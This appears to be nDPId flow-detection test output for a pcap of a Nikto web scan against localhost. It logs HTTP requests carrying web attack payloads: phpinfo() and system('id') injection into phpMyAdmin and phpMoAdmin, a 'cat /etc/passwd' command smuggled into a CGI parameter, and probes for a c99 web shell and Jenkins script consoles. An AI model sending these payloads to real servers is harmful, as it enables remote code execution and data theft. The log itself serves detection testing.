-01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 